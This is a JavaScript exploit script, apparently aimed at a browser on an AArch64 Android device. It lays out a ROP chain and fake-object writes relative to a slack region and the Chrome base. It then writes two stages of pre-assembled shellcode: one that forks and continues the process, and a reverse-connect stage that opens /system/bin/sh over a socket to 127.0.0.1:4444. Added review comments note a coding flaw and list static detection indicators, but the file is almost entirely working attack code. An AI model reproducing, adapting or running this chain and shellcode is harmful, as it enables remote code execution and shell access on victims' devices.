exploit.js
/*
 * Entry point of the exploit script.
 *
 * Configures the target-specific vtable offset, lays out a ROP chain and two
 * shellcode stages in the "slack" region through the write8* helpers, and then
 * calls start(). Every helper used here (set_offset_vtable, set_rop_start,
 * write8, write8_slack_base_plus_val, write8_chrome_base_plus_val,
 * write8_slack_base_aligned, start) and every constant (OFFSET_VTABLE,
 * OFFSET_RETURN, G1..G6, debug) is defined outside this listing; their exact
 * semantics cannot be confirmed from this file alone.
 *
 * Takes no parameters and returns nothing; all effects are through the helpers.
 *
 * NOTE(review): `offset` is assigned below without a declaration. In sloppy
 * mode that creates or overwrites a global; in strict mode or an ES module it
 * throws a ReferenceError. Declare it with `let` if no other code relies on it.
 */
function exploit() {
/*
 * General target settings.
 */
set_offset_vtable(OFFSET_VTABLE);
/*
 * Place the ROP chain at the beginning of the slack memory space.
 * In debug mode a fixed placeholder address is used instead of the G1 gadget;
 * note that OFFSET_VTABLE, G1..G6 and OFFSET_RETURN are all target-version
 * specific, so this function only works against the build they were taken from.
 */
if (debug) {
set_rop_start(0x112233445577n);
} else {
set_rop_start(G1);
}
/*
 * ROP chain / fake-object layout. Each call writes one 8-byte value relative to
 * either the slack base or the chrome base (or an absolute slack offset for
 * plain write8). The meaning of the individual offsets depends on the
 * target-specific gadgets and is not recoverable from this listing.
 */
write8_slack_base_plus_val(0x48+8, 0x100);
write8_chrome_base_plus_val(0x100+0x100, G2);
write8_chrome_base_plus_val(0x100+0x190, G3);
write8_slack_base_plus_val(0x100+0x80, 0x300);
write8_slack_base_plus_val(0x48+0x68+8, 0);
write8_slack_base_plus_val(0x100, 0x260);
write8_chrome_base_plus_val(0x260+0xf8, G4);
write8_chrome_base_plus_val(0x100+0x18, G5);
write8(0x100+0x38, 226);
write8_chrome_base_plus_val(0x100+0x10, G6);
write8_slack_base_plus_val(0x3b8, 0x1000);
write8(0x300+0x28, 0);
write8(0x300+0x20, 0);
write8(0x300+0x18, 0);
write8(0x300+0x10, 7);
write8(0x300+0x8, 0x4000);
write8_slack_base_aligned(0x300);
/*
 * Place shellcode after ROP chain in the slack memory space.
 * `offset` is the running write cursor; every write8 below advances it by 8.
 */
offset = 0x1000;
/*
 * Shellcode for forking and process continuation.
 * Generated from shellcode/shellcode.S.
 * The values are pre-assembled AArch64 machine code stored as 64-bit literals
 * (two instructions per qword); they are copied verbatim, not built here.
 */
write8(offset, 0x4141414114000003n); offset += 8;
write8(offset, 0xd280000041414141n); offset += 8;
write8(offset, 0xd2800062d2820001n); offset += 8;
write8(offset, 0x92800004d2800443n); offset += 8;
write8(offset, 0xd2801bc8d2800005n); offset += 8;
write8(offset, 0xaa0003e1d4000001n); offset += 8;
write8(offset, 0xd2800000913fc021n); offset += 8;
write8(offset, 0xd2800003d2800002n); offset += 8;
write8(offset, 0xd4000001d2801b88n); offset += 8;
write8(offset, 0x54000060f100001fn); offset += 8;
write8(offset, 0xd65f03c058fffdben); offset += 8;
/*
 * Replace dummy value in shellcode for process continuation.
 * The 8-byte write at 0x1000+4 overwrites the 0x41414141 placeholder bytes that
 * straddle the first two qwords above with a chrome-base-relative address.
 */
write8_chrome_base_plus_val(0x1000+4, OFFSET_RETURN);
/*
 * Reverse connect shellcode (127.0.0.1:4444).
 * Generated from shellcode/reverse.S.
 * Detection note: the tail of this stage is plain data — the qword
 * 0x0100007f5c110002 appears to be the sockaddr (AF_INET, port 4444,
 * 127.0.0.1 stated above), and the last three qwords appear to hold the
 * NUL-terminated ASCII string "/system/bin/sh". Both are static, greppable
 * indicators for this sample.
 */
write8(offset, 0xd2800021d2800040n); offset += 8;
write8(offset, 0xd28018c8d2800002n); offset += 8;
write8(offset, 0xaa0003e4d4000001n); offset += 8;
write8(offset, 0xd280020210000301n); offset += 8;
write8(offset, 0xd4000001d2801968n); offset += 8;
write8(offset, 0xaa0403e0d2800308n); offset += 8;
write8(offset, 0xd2800002d2800001n); offset += 8;
write8(offset, 0xaa0403e0d4000001n); offset += 8;
write8(offset, 0xd2800002d2800021n); offset += 8;
write8(offset, 0xaa0403e0d4000001n); offset += 8;
write8(offset, 0xd2800002d2800041n); offset += 8;
write8(offset, 0x10000120d4000001n); offset += 8;
write8(offset, 0x910003e1f90003e0n); offset += 8;
write8(offset, 0xd2801ba8d2800002n); offset += 8;
write8(offset, 0x14000000d4000001n); offset += 8;
write8(offset, 0x0100007f5c110002n); offset += 8;
write8(offset, 0x2f6d65747379732fn); offset += 8;
write8(offset, 0x000068732f6e6962n); offset += 8;
write8(offset, 0x0000000000000000n); offset += 8;
/*
 * Finally launch the exploit.
 * start() is an external helper; nothing in this file checks its result.
 */
start();
}